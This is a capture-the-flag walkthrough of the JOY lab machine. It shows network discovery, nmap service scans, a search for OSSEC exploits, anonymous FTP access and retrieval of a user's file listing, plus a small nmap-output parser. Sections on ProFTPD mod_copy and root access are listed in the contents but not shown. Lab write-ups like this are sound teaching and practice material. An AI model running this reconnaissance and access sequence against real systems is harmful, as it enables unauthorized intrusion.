Red Team Target Practice: DIGITALWORLD.LOCAL: JOY

Contents

Information gathering

1. arp-scan

2. netdiscover

3. nmap

WEB

Web service on port 80

Vulnerability lookup

Vulnerability testing

enum4linux

FTP anonymous login

FTP file copy vulnerability (ProFTPD mod_copy)

Addendum

openssl

get root

Summary


Information gathering

1. arp-scan
┌──(root㉿ru)-[~/kali]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:69:c7:bf, IPv4: 192.168.12.128
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.12.1    00:50:56:c0:00:08       VMware, Inc.
192.168.12.2    00:50:56:ec:d1:ca       VMware, Inc.
192.168.12.143  00:50:56:39:8a:fb       VMware, Inc.
192.168.12.254  00:50:56:f5:76:5b       VMware, Inc.

5 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.361 seconds (108.43 hosts/sec). 4 responded

2. netdiscover
netdiscover -r 192.168.12.0/24

 Currently scanning: Finished!   |   Screen View: Unique Hosts

 4 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 240
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.12.1    00:50:56:c0:00:08      1      60  VMware, Inc.
 192.168.12.2    00:50:56:ec:d1:ca      1      60  VMware, Inc.
 192.168.12.143  00:50:56:39:8a:fb      1      60  VMware, Inc.
 192.168.12.254  00:50:56:f5:76:5b      1      60  VMware, Inc.


3. nmap
Host discovery

┌──(root㉿ru)-[~/kali]
└─# nmap -sn 192.168.12.0/24 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-23 12:08 CST
Nmap scan report for 192.168.12.1
Host is up (0.00026s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.12.2
Host is up (0.000051s latency).
MAC Address: 00:50:56:EC:D1:CA (VMware)
Nmap scan report for 192.168.12.143
Host is up (0.00012s latency).
MAC Address: 00:50:56:39:8A:FB (VMware)
Nmap scan report for 192.168.12.254
Host is up (0.0026s latency).
MAC Address: 00:50:56:F5:76:5B (VMware)
Nmap scan report for 192.168.12.128
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 0.66 seconds


Port scan

┌──(root㉿ru)-[~/kali]
└─# nmap -p- 192.168.12.143 --min-rate 10000 -oA ports
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-23 12:09 CST
Nmap scan report for 192.168.12.143
Host is up (0.0014s latency).
Not shown: 65523 closed tcp ports (reset)
PORT    STATE SERVICE
21/tcp  open  ftp
22/tcp  open  ssh
25/tcp  open  smtp
80/tcp  open  http
110/tcp open  pop3
139/tcp open  netbios-ssn
143/tcp open  imap
445/tcp open  microsoft-ds
465/tcp open  smtps
587/tcp open  submission
993/tcp open  imaps
995/tcp open  pop3s
MAC Address: 00:50:56:39:8A:FB (VMware)

Nmap done: 1 IP address (1 host up) scanned in 5.73 seconds

┌──(root㉿ru)-[~/kali]
└─# cat ports.nmap | head -n 17 | tail -n 12 | awk -F "/" '{print $1}' | xargs -n 12 | sed 's/ /,/g'
21,22,25,80,110,139,143,445,465,587,993,995
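The one-liner above hard-codes head/tail offsets that are only right for this particular scan. As an added example (not part of the original write-up), the following parser reads nmap's normal-format output, the same text that -oA writes to ports.nmap, and returns the open ports together with the service and version columns when they are present; the samples are the scan output reproduced from this page. The .gnmap file that -oA also writes is the grep-friendly alternative.

```python
import re
import sys

# One port line of nmap normal output, e.g. "445/tcp open  microsoft-ds" or, with -sV,
# "21/tcp  open  ftp         ProFTPD 1.2.10". NSE script lines begin with "|" and never match.
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+"
    r"(?P<state>open|closed|filtered|unfiltered|open\|filtered|closed\|filtered)\s+"
    r"(?P<service>\S+)(?:\s+(?P<version>.+?))?\s*$"
)


def parse_nmap_ports(text: str, state: str = "open") -> list[dict]:
    """Return one dict per port line in the given state (default: open)."""
    found = []
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if m and m.group("state") == state:
            found.append({
                "port": int(m.group("port")),
                "proto": m.group("proto"),
                "service": m.group("service"),
                "version": m.group("version") or "",
            })
    return found


def port_list(text: str) -> str:
    """Comma-joined open ports, ready to paste into nmap -p."""
    return ",".join(str(p["port"]) for p in parse_nmap_ports(text))


# Constructed sample: the full-range port scan reproduced from the write-up.
SAMPLE_PORT_SCAN = """\
Nmap scan report for 192.168.12.143
Host is up (0.0014s latency).
Not shown: 65523 closed tcp ports (reset)
PORT    STATE SERVICE
21/tcp  open  ftp
22/tcp  open  ssh
25/tcp  open  smtp
80/tcp  open  http
110/tcp open  pop3
139/tcp open  netbios-ssn
143/tcp open  imap
445/tcp open  microsoft-ds
465/tcp open  smtps
587/tcp open  submission
993/tcp open  imaps
995/tcp open  pop3s
MAC Address: 00:50:56:39:8A:FB (VMware)
"""

# Constructed sample: a few -sVC lines from the same write-up, including NSE output.
SAMPLE_SERVICE_SCAN = """\
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         ProFTPD 1.2.10
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxr-x   2 ftp      ftp          4096 Dec 23 05:02 upload
22/tcp  open  ssh         Dropbear sshd 0.34 (protocol 2.0)
993/tcp open  ssl/imap    Dovecot imapd
"""

if __name__ == "__main__":
    # Usage: python3 nmap_ports.py ports.nmap   (falls back to the embedded sample)
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_PORT_SCAN
    print(port_list(text))
```

Run it against ports.nmap to get the comma list for the follow-up -sVC scan; the parsed dicts are also handy for feeding each service/version pair into searchsploit.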


Service and OS detection

┌──(root㉿ru)-[~/kali]
└─# nmap -sVC -O -p- 192.168.12.143 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-23 13:53 CST
Nmap scan report for 192.168.12.143
Host is up (0.00047s latency).
Not shown: 65523 closed tcp ports (reset)
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         ProFTPD 1.2.10
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxrwxr-x   2 ftp      ftp          4096 Dec 23 04:56 download
|_drwxrwxr-x   2 ftp      ftp          4096 Dec 23 05:02 upload
22/tcp  open  ssh         Dropbear sshd 0.34 (protocol 2.0)
25/tcp  open  smtp        Postfix smtpd
|_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=JOY
| Subject Alternative Name: DNS:JOY
| Not valid before: 2018-12-23T14:29:24
|_Not valid after:  2028-12-20T14:29:24
80/tcp  open  http        Apache httpd 2.4.25
| http-ls: Volume /
| SIZE  TIME              FILENAME
| -     2016-07-19 20:03  ossec/
|_
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Index of /
110/tcp open  pop3        Dovecot pop3d
| ssl-cert: Subject: commonName=JOY/organizationName=Good Tech Pte. Ltd/stateOrProvinceName=Singapore/countryName=SG
| Not valid before: 2019-01-27T17:23:23
|_Not valid after:  2032-10-05T17:23:23
|_ssl-date: TLS randomness does not represent time
|_pop3-capabilities: SASL AUTH-RESP-CODE UIDL PIPELINING STLS TOP CAPA RESP-CODES
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imapd
| ssl-cert: Subject: commonName=JOY/organizationName=Good Tech Pte. Ltd/stateOrProvinceName=Singapore/countryName=SG
| Not valid before: 2019-01-27T17:23:23
|_Not valid after:  2032-10-05T17:23:23
|_ssl-date: TLS randomness does not represent time
|_imap-capabilities: LOGIN-REFERRALS ENABLE more OK post-login LITERAL+ listed capabilities Pre-login have SASL-IR IDLE IMAP4rev1 LOGINDISABLEDA0001 ID STARTTLS
445/tcp open  netbios-ssn Samba smbd 4.5.12-Debian (workgroup: WORKGROUP)
465/tcp open  smtp        Postfix smtpd
| ssl-cert: Subject: commonName=JOY
| Subject Alternative Name: DNS:JOY
| Not valid before: 2018-12-23T14:29:24
|_Not valid after:  2028-12-20T14:29:24
|_ssl-date: TLS randomness does not represent time
|_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8
587/tcp open  smtp        Postfix smtpd
| ssl-cert: Subject: commonName=JOY
| Subject Alternative Name: DNS:JOY
| Not valid before: 2018-12-23T14:29:24
|_Not valid after:  2028-12-20T14:29:24
|_ssl-date: TLS randomness does not represent time
|_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8
993/tcp open  ssl/imap    Dovecot imapd
|_imap-capabilities: LOGIN-REFERRALS ENABLE more Pre-login LITERAL+ post-login listed capabilities have SASL-IR IDLE IMAP4rev1 OK ID AUTH=PLAINA0001
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=JOY/organizationName=Good Tech Pte. Ltd/stateOrProvinceName=Singapore/countryName=SG
| Not valid before: 2019-01-27T17:23:23
|_Not valid after:  2032-10-05T17:23:23
995/tcp open  ssl/pop3    Dovecot pop3d
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=JOY/organizationName=Good Tech Pte. Ltd/stateOrProvinceName=Singapore/countryName=SG
| Not valid before: 2019-01-27T17:23:23
|_Not valid after:  2032-10-05T17:23:23
|_pop3-capabilities: AUTH-RESP-CODE USER UIDL PIPELINING SASL(PLAIN) TOP CAPA RESP-CODES
MAC Address: 00:50:56:39:8A:FB (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Hosts: The,  JOY.localdomain, 127.0.1.1, JOY; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: JOY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.5.12-Debian)
|   Computer name: joy
|   NetBIOS computer name: JOY\x00
|   Domain name: \x00
|   FQDN: joy
|_  System time: 2023-12-23T13:30:06+08:00
|_clock-skew: mean: -3h03m55s, deviation: 4h37m07s, median: -23m56s
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time:
|   date: 2023-12-23T05:30:06
|_  start_date: N/A
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 57.98 seconds


21/tcp  open  ftp         ProFTPD 1.2.10
22/tcp  open  ssh         Dropbear sshd 0.34 (protocol 2.0)
25/tcp  open  smtp        Postfix smtpd
80/tcp  open  http        Apache httpd 2.4.25
110/tcp open  pop3        Dovecot pop3d
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imapd
445/tcp open  netbios-ssn Samba smbd 4.5.12-Debian (workgroup: WORKGROUP)
465/tcp open  smtp        Postfix smtpd
587/tcp open  smtp        Postfix smtpd
993/tcp open  ssl/imap    Dovecot imapd
995/tcp open  ssl/pop3    Dovecot pop3d


The target runs FTP on port 21, and nmap's ftp-anon script already reports that anonymous login is allowed, so we try anonymous/anonymous.

WEB

Web service on port 80


Port 80 serves a bare directory listing with a single entry, ossec/, the OSSEC web UI, whose page reports:

OSSEC  Version 0.8


Vulnerability lookup
┌──(root㉿ru)-[~/kali]
└─# searchsploit OSSEC 0.8
------------------------------------ ---------------------------------
 Exploit Title                      |  Path
------------------------------------ ---------------------------------
OSSEC WUI 0.8 - Denial of Service   | php/dos/37728.py
------------------------------------ ---------------------------------
Shellcodes: No Results


Only a denial of service against the web UI, which is of little use for getting a shell.

Vulnerability testing

enum4linux


No share directories were found, but two user accounts were enumerated.
FTP anonymous login
┌──(root㉿ru)-[~/kali]
└─# ftp 192.168.12.143
Connected to 192.168.12.143.
220 The Good Tech Inc. FTP Server
Name (192.168.12.143:root): anonymous
331 Anonymous login ok, send your complete email address as your password
Password:
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -al
229 Entering Extended Passive Mode (|||24983|)
150 Opening ASCII mode data connection for file list
drwxr-x---   4 ftp      ftp          4096 Jan  6  2019 .
drwxr-x---   4 ftp      ftp          4096 Jan  6  2019 ..
drwxrwxr-x   2 ftp      ftp          4096 Jan  6  2019 download
drwxrwxr-x   2 ftp      ftp          4096 Jan 10  2019 upload
226 Transfer complete
ftp>

Download everything to the local machine:

wget -r ftp://192.168.12.143

┌──(root㉿ru)-[~/kali]
└─# wget -r ftp://192.168.12.143
--2023-12-23 12:26:27--  ftp://192.168.12.143/
           => "192.168.12.143/.listing"
Connecting to 192.168.12.143:21... connected.
Logging in as anonymous ... Logged in!
==> SYST ... done.    ==> PWD ... done.
==> TYPE I ... done.  ==> CWD not needed.
==> PASV ... done.    ==> LIST ... done.

192.168.12.143/.l     [ <=>        ]     245  --.-KB/s    in 0s

2023-12-23 12:26:27 (23.5 MB/s) - "192.168.12.143/.listing" saved [245]

Removed "192.168.12.143/.listing".
--2023-12-23 12:26:27--  ftp://192.168.12.143/download/


......

Inspect what came down

┌──(root㉿ru)-[~/kali/192.168.12.143/upload]
└─# cat directory
Patrick's Directory

total 296
drwxr-xr-x 18 patrick patrick 12288 Dec 23 12:20 .
drwxr-xr-x  4 root    root     4096 Jan  6  2019 ..
-rw-r--r--  1 patrick patrick     0 Dec 23 11:10 0APcUzrezRkPOwgeG6hcYalq0aNYbxGT.txt
-rw-r--r--  1 patrick patrick    24 Dec 23 09:10 0Uut7GjDsY93A8uW1TX73LM0TQe5kQA9MZBMtmzJDWfXwUdGOv8Qt8igjMOKp2TQ.txt
-rw-r--r--  1 patrick patrick     0 Dec 23 09:30 1mh0Vb2h2Qt2GtiSPwfnZp4SFEhGQtJQ.txt
-rw-r--r--  1 patrick patrick    24 Dec 23 09:55 2A0Ycro0JfNzXFxSu4IN6UUdAaOd1oIW4RvW6qiufdWFQbBz6Z8CQmnxmAXIXSFG.txt
-rw-r--r--  1 patrick patrick    24 Dec 23 12:00 3EL0Bxf9ABvZCoMtd5HoBIK5U7FcNThrlh3RfmQ0hMfa9CeyuZTEtd4czfGiV3FF.txt
-rw-r--r--  1 patrick patrick    24 Dec 23 12:10 3jkQisT7ftfCJfRI9D6Z9PWaPjwYL2Kn7Yu4qtJWz6zefIupuEBfiwAEQfwz2mQU.txt
-rw-r--r--  1 patrick patrick     0 Dec 23 09:05 3o2pwZJo6SgV57TjdIRbKOGWOGiGDGo8.txt
-rw-r--r--  1 patrick patrick    24 Dec 23 11:45 4He8Q4C4qcrzwSxjpE3J4RDabNN8lpOExUObSNFTo0VDgXjt7itjgqb6gmkRMFnb.txt
-rw-r--r--  1 patrick patrick    24 Dec 23 11:25 5Vy87GqjypFSpNHc5qQHVSMrdopnHwFUfxbe2xxno7z0TBhyvHhhCU5DnQOjhTuG.txt
-rw-r--r--  1 patrick patrick     0 Dec 23 11:45 6GDqtlAbCWYi5fry41O05js2QmVNRQH2.txt
-rw-r--r--  1 patrick patrick     0 Dec 23 10:15 76XiOMWUzp78mBFbruXoFaLJmNoVxbs3.txt
-rw-r--r--  1 patrick patrick     0 Dec 23 11:30 9v1aE2rt8T7s6WEF1fShKcnCHNyvqgqx.txt
-rw-------  1 patrick patrick   185 Jan 28  2019 .bash_history
-rw-r--r--  1 patrick patrick   220 Dec 23  2018 .bash_logout
-rw-r--r--  1 patrick patrick  3526 Dec 23  2018 .bashrc
-rw-r--r--  1 patrick patrick    24 Dec 23 10:15 bCz8XOzaevSMbb77dxNiDFfgFDHmx9iiSuaEPzYkrX29PECJcfY4ZxyNf5bQ5k63.txt
-rw-r--r--  1 patrick patrick    24 Dec 23 09:25 c1j8aagaLUVgR2OcbMOmMhHCXho1LHN4C9PZSZhM60IVBrHsfIqGAHKulsL4cbnu.txt
drwx------  7 patrick patrick  4096 Jan 10  2019 .cache
-rw-r--r--  1 patrick patrick     0 Dec 23 11:25 ce7QXnXSJkAMtAodif6dJAIs5ovfpPld.txt
-rw-r--r--  1 patrick patrick     0 Dec 23 12:00 cohufDkIm3pDMqHmdfXBWevR8KXm7BoT.txt
drwx------ 10 patrick patrick  4096 Dec 26  2018 .config
-rw-r--r--  1 patrick patrick     0 Dec 23 10:05 CRz3fJMSy7z7iK4PGJGynR4tV8w9OFu5.txt
-rw-r--r--  1 patrick patrick    24 Dec 23 10:35 cSdp1fs0NF2p1IrXBNVnpEQfEdJ5Vjo3i33aPDeGfoCOkBlewqKYrsKf8hlgFzfB.txt
-rw-r--r--  1 patrick patrick    24 Dec 23 10:05 cSoTVy6kU6UOpin3A9MijX0jZHoDGs6R9SkmctC0cFtCvBP2GKAqTDdMVIOxIRGw.txt
-rw-r--r--  1 patrick patrick     0 Dec 23 11:15 Cz6wRBcHu3m5vx9bXi9iP7iLnGPnnsUN.txt
-rw-r--r--  1 patrick patrick     0 Dec 23 08:50 CZi5oGhDUS2zFztvN0HYZrEFB59GTEJs.txt
-rw-r--r--  1 patrick patrick     0 Dec 23 10:55 DEOrWi6ngz1Q1jSH09jByyacy7SHg3Te.txt
drwxr-xr-x  2 patrick patrick  4096 Dec 26  2018 Desktop
-rw-r--r--  1 patrick patrick     0 Dec 23 09:25 dJ20wzUzHbNYShDugssLHZrKspu9q7lu.txt
-rw-r--r--  1 patrick patrick     0 Dec 23 11:50 Djc6Z0ARP52ZNS2oHBQM4Gwo6zipi7lZ.txt
-rw-r--r--  1 patrick patrick     0 Dec 23 12:15 DnaF7Y6ZnulApvJYzT8CnqjZUYE9DFd0.txt
-rw-r--r--  1 patrick patrick     0 Dec 23 10:45 dO7qDezUtC9hnu2dRrgpPpzYhBmKjHaT.txt
drwxr-xr-x  2 patrick patrick  4096 Dec 26  2018 Documents
drwxr-xr-x  3 patrick patrick  4096 Jan  6  2019 Downloads
-rw-r--r--  1 patrick patrick     0 Dec 23 09:20 eFuYh9XT7PdqfVJGnzBSI6aAowQEFvCV.txt
-rw-r--r--  1 patrick patrick    24 Dec 23 11:50 euUe6HdisyDpDeebvhp7cuUDqd4AB9WzpTJyaSg8E7mHvQgept68IAmJqYbvgKzj.txt
-rw-r--r--  1 patrick patrick    24 Dec 23 09:00 f4EyHhDroF7XaP0sGEDAuVNPi2lOTBWION6u2OvFZISkE1xZ8Vf1GhQ4wNboU3wm.txt
-rw-r--r--  1 patrick patrick    24 Dec 23 09:50 FBNEQJPefIPUnuMZBYqnL2QD8RucEfcONQKaN1t7krPs0J611XVSjtQWeCRhEnPq.txt
-rw-r--r--  1 patrick patrick    24 Dec 23 09:40 gh7JWEqY7iT28wisr5x4OWla8X2PKV8aeTVhh8jIATAdNH58EhdTpSSjOCSU0LLQ.txt
drwx------  3 patrick patrick  4096 Dec 26  2018 .gnupg
-rw-r--r--  1 patrick patrick    24 Dec 23 08:40 gZQc2udlXinC9eGRqBUMzmI2PoNibkYWQQnXVO3RlJywvzTYGRqvPac6ZLjoQFXR.txt
-rwxrwxrwx  1 patrick patrick     0 Jan  9  2019 haha
-rw-r--r--  1 patrick patrick     0 Dec 23 09:10 Hm76sr2wwQ4ptiWe0b9v3lmLwPsD3SPH.txt
-rw-r--r--  1 patrick patrick     0 Dec 23 10:25 hphC1rhKH9qP3hjxZhQhN42OfwLbgVwW.txt
-rw-r--r--  1 patrick patrick    24 Dec 23 08:55 hqMu03wQ9AbM1tHvUoVBlj4mt4G5n3UpzmlituoWZxYyMYS749CJf5Y4pTVw6ZFA.txt
-rw-------  1 patrick patrick  8532 Jan 28  2019 .ICEauthority
-rw-r--r--  1 patrick patrick     0 Dec 23 10:20 ihuypNegCZg2I3vORklHtS1pH7fQUoN2.txt
-rw-r--r--  1 patrick patrick     0 Dec 23 12:05 IL9qoiSShSppRNGmx09B3bwGmTWsOj8c.txt
-rw-r--r--  1 patrick patrick     0 Dec 23 11:35 INKzunaXqbgmppM7mpa935Y7HZ6520j0.txt
-rw-r--r--  1 patrick patrick     0 Dec 23 09:40 JlLcoI7Tz9Pl6HEmnyTvd77j6mlamuSN.txt
-rw-r--r--  1 patrick patrick    24 Dec 23 09:45 juJzf2nUHIDbDaRud8pl5zxAqsEw0vJBxU7ZCbagPgZoqDY1ENxnf8P5j7SipaMs.txt
-rw-r--r--  1 patrick patrick     0 Dec 23 10:50 jZNJ5qQtdC1qz2mUm3O6wtWdrgL4ztQw.txt
-rw-r--r--  1 patrick patrick    24 Dec 23 10:20 kCPhQMs49E28fomi1QZr4fItT4tQ4BsmxJ3GP76VKuJ8e9BDKIe17Hchw5C9D6Bm.txt
-rw-r--r--  1 patrick patrick    24 Dec 23 09:20 l1kj81leiMsiJ89jNFiZnyWJfU4rKhXMUn0Pi09SdCdcpfb7XgfcXseTuDXVBf7a.txt
-rw-r--r--  1 patrick patrick     0 Dec 23 09:00 LiD08mJKtbGhiCdrxllJRZ91S7FCtKRA.txt
drwxr-xr-x  3 patrick patrick  4096 Dec 26  2018 .local
-rw-r--r--  1 patrick patrick     0 Dec 23 11:40 lWfKgR42QRUjEaWJHrJbdEPLIB1Oudpr.txt
-rw-r--r--  1 patrick patrick     0 Dec 23 11:55 lY7iHV1K8oGRU56g4z2sOW8coSX35b9t.txt
-rw-r--r--  1 patrick patrick     0 Dec 23 08:45 M8b5nhPZBb1zvE9qf8KkNG35rA7Qs23b.txt
-rw-r--r--  1 patrick patrick    24 Dec 23 08:45 mBRzhbWK3FT36xspzTWEOkay52Fxnw6nBaz5kLxsP57CJVLD6iocTcpKUyfH0zHn.txt
drwx------  5 patrick patrick  4096 Dec 28  2018 .mozilla
-rw-r--r--  1 patrick patrick    24 Dec 23 11:35 mqDT1exLXz5wjT3ACJQQPcvvYLPkWpxZvhqD8LErO6UHBMqtIVzviSwaHgz4c8dh.txt
drwxr-xr-x  2 patrick patrick  4096 Dec 26  2018 Music
-rw-r--r--  1 patrick patrick    24 Dec 23 12:15 MyoIzdkB2a4qI601jWfzZMmj3iPiWPUvnYv57A9NL6rOM1T73zQhlhngxTj2jPQQ.txt
drwxr-xr-x  2 patrick patrick  4096 Jan  8  2019 .nano
-rw-r--r--  1 patrick patrick    24 Dec 23 11:20 nExzMWWtZCc2HGuDyobIc4DYQ8BUQVWFgBpm4fUa0Fa2bzkmaKVNGktMLntGBIOt.txt
-rw-r--r--  1 patrick patrick    24 Dec 23 11:00 NGm1C258NK1z1skr4k1Xn6zNMhgAqzKYJnv23rFFKoRCfBJTB3sjxeovXkWOOm2M.txt
-rw-r--r--  1 patrick patrick     0 Dec 23 09:45 NoSfqlPOL1CrY8Q8ItcTODix5vjDlDCj.txt
-rw-r--r--  1 patrick patrick    24 Dec 23 11:10 NyMoWmNgqFGEXV5k4FpyFJ0LFeUXM5UAP91enGtbVkOyG89JVxgw5xK41KBXnMnD.txt
-rw-r--r--  1 patrick patrick     0 Dec 23 09:55 oHihdjDTwKUK3SmjC4ycSJYDwxluGBW6.txt
-rw-r--r--  1 patrick patrick    24 Dec 23 10:10 OsBV2KBqFfn8VizzKu3XJUfk5wjJUOlddIQi9Dicfrqaa36k9MJmhqFQddTLVJzX.txt
drwxr-xr-x  2 patrick patrick  4096 Dec 26  2018 Pictures
-rw-r--r--  1 patrick patrick   675 Dec 23  2018 .profile
-rw-r--r--  1 patrick patrick     0 Dec 23 12:20 PtPJ7bVY58mNQGO9EUzm5VLoWTGup0iy.txt
drwxr-xr-x  2 patrick patrick  4096 Dec 26  2018 Public
-rw-r--r--  1 patrick patrick     0 Dec 23 10:35 PWXtRSNVPhQj8NsljWJLvSH7HOdonhWf.txt
-rw-r--r--  1 patrick patrick    24 Dec 23 11:15 pX3rccVlbg1v1fGZEE0zzc7YxeY2ZONgnxX5nX7r1mryKN7GvaDWPstIl3O6ySyW.txt
-rw-r--r--  1 patrick patrick    24 Dec 23 10:00 q3IKVZwuYqDAGnvHtR3SUoI2RuboN4lU9Eqwsed25nqlQ9IZumFLXORYpoCABOKB.txt
-rw-r--r--  1 patrick patrick     0 Dec 23 10:10 qAhM9P6s04amzXUBzKpD7e6VDAdoolCw.txt
-rw-r--r--  1 patrick patrick     0 Dec 23 10:40 qxTxQEIMdP5yGIGN0BRYPfeCsCI2ecGz.txt
-rw-r--r--  1 patrick patrick     0 Dec 23 08:40 qYcMJJW9qtjQa1osridiRYVoBW2QS8oR.txt
-rw-r--r--  1 patrick patrick    24 Dec 23 12:05 RMV49nnvahfDVe99ekI9SdYXwRKkiM1T9thlNIZtKRaxzWaZOgxfwHG8UACcAXwD.txt
-rw-r--r--  1 patrick patrick    24 Dec 23 09:30 rsTq66AHW73BMf7Gbjsao4X6sz342DFtEGq3i22WfLn2E8DiMAkRfQNgrKsoFdbE.txt
-rw-r--r--  1 patrick patrick    24 Dec 23 10:50 rwgVn2tIkXA988sp8PweMuTvLNxG6lC00QwsCTsu67u7OdJVeo9xwtUvKceLmvcL.txt
-rw-r--r--  1 patrick patrick    24 Dec 23 09:35 s6AQY7ctMHW1Wkncds7eUAXSnIEDv8fVAk9qzyFEKjECq9BDDeatM7mpzf5CikC4.txt
-rw-r--r--  1 patrick patrick    24 Dec 23 10:55 s7liOxU9gHtOHxUq5kxhDMLKiwHZbLy3CDU8wyq8aoOGRbmFtYNpWy5a6BptXrr0.txt
d---------  2 root    root     4096 Jan  9  2019 script
-rw-r--r--  1 patrick patrick     0 Dec 23 10:00 sfOUhB0wZDyu7Ci9ZK9IM6wOhpsHzIdZ.txt
-rw-r--r--  1 patrick patrick     0 Dec 23 12:10 SiUHflaLPQumL4cwxZRRVMRAZeMwMALV.txt
-rw-r--r--  1 patrick patrick    24 Dec 23 09:15 sMFOR1kBdvs14DiFYFN1CTIfUer8esy5aDgchDHUVz6HslA1Jaxbc1kMu8x3OyY2.txt
drwx------  2 patrick patrick  4096 Dec 26  2018 .ssh
-rw-r--r--  1 patrick patrick     0 Jan  6  2019 Sun
-rw-r--r--  1 patrick patrick    24 Dec 23 11:40 swVYvrQmIhAwHNBbRy07jjKg7b52w8xklfxnHWQoliv9LQoUpjTeimYwlVdur4Dr.txt
drwxr-xr-x  2 patrick patrick  4096 Dec 26  2018 Templates
-rw-r--r--  1 patrick patrick     0 Dec 23 10:30 TGIcDiWeOxxquNVSlk038rua6ilHoKjM.txt
-rw-r--r--  1 patrick patrick    24 Dec 23 11:05 toEWVuiWnQIkbYBRo1cJzJJ1JRJZm1YEO2hzo0viFzjlg8MOpFgDRyZynzBS1H0e.txt
-rw-r--r--  1 patrick patrick    24 Dec 23 12:20 TqXVg2vjXeXCAnmHyqjHcr2Y8TiuZbHBbiTCzkbW8ksoysswTdA7QwgWU0kCIwym.txt
-rw-r--r--  1 patrick patrick     0 Dec 23 11:00 twyI3qe1fqOsYM8HMcfvYFC1cTC1FvzE.txt
-rw-r--r--  1 patrick patrick     0 Jan  6  2019 .txt
-rw-r--r--  1 patrick patrick   407 Jan 27  2019 version_control
-rw-r--r--  1 patrick patrick    24 Dec 23 10:40 vGd50dGxKBDrHE6AdCnH3PvJX3isE8QfVkd2csJ3Rxbfd7TBv81SybZsJWaPhW1S.txt
drwxr-xr-x  2 patrick patrick  4096 Dec 26  2018 Videos
-rw-r--r--  1 patrick patrick    24 Dec 23 11:30 VitkbM0AXiAhZYJlbtpmszQbPu8knx9fZxQ0zRBxKKzoLUMp06C3GVlmM0ZJAWRh.txt
-rw-r--r--  1 patrick patrick     0 Dec 23 08:55 vnPhu2Vxt290p83Jow9zEvc545yb7qnH.txt
-rw-r--r--  1 patrick patrick     0 Dec 23 09:35 W2Jdam0bsm6aeg1BbGm8afllfJ7zr585.txt
-rw-r--r--  1 patrick patrick     0 Dec 23 08:35 W53A1t82c5QmgA8ETG4toakDqRweB6B0.txt
-rw-r--r--  1 patrick patrick    24 Dec 23 08:50 wfTZmH9p8gntYI4hFnmqM3erXI876F5rTpGKzBapvkoGCwW5ORk9BBflsAd9oS7W.txt
-rw-r--r--  1 patrick patrick     0 Dec 23 09:15 Wok4a0kNFZgvnsmFToU7sU0Ot2DeJjr9.txt
-rw-r--r--  1 patrick patrick    24 Dec 23 11:55 WWduRKKnOS8bMQs5wD5EGTfXTyuXTP918EswUhh0dxA6H0nwPkfQ3C73yYG1BM4e.txt
-rw-r--r--  1 patrick patrick     0 Dec 23 11:20 XPvL5Ax8wN5mVHbDRWD0gK9GFce86b11.txt
-rw-r--r--  1 patrick patrick     0 Dec 23 09:50 Yec4Wj8LH8yxSfCSONBZaKtHqnsbCuGr.txt
-rw-r--r--  1 patrick patrick    24 Dec 23 08:35 YgG4CnvsSsgBDE5eH8XAlNEdM1lqALxk8SmMfRc0TVpZdK4wfQXzUFieebvA092g.txt
-rw-r--r--  1 patrick patrick    24 Dec 23 09:05 YqDGUefoci5XPPLpp1PujhJhQm5HlaxLrKixWwBVF0F80yEhcNLToGYc6W3Wzcb1.txt
-rw-r--r--  1 patrick patrick     0 Dec 23 11:05 yxTRmFQv4340u69AvFWhv9TBrIRhBglb.txt
-rw-r--r--  1 patrick patrick    24 Dec 23 10:30 Z1HFJ8x52grnH5EoefAaOI2GtSxTRypSAUL3SVe7Dma7WFBMVGAGfCJHer6X5ZfB.txt
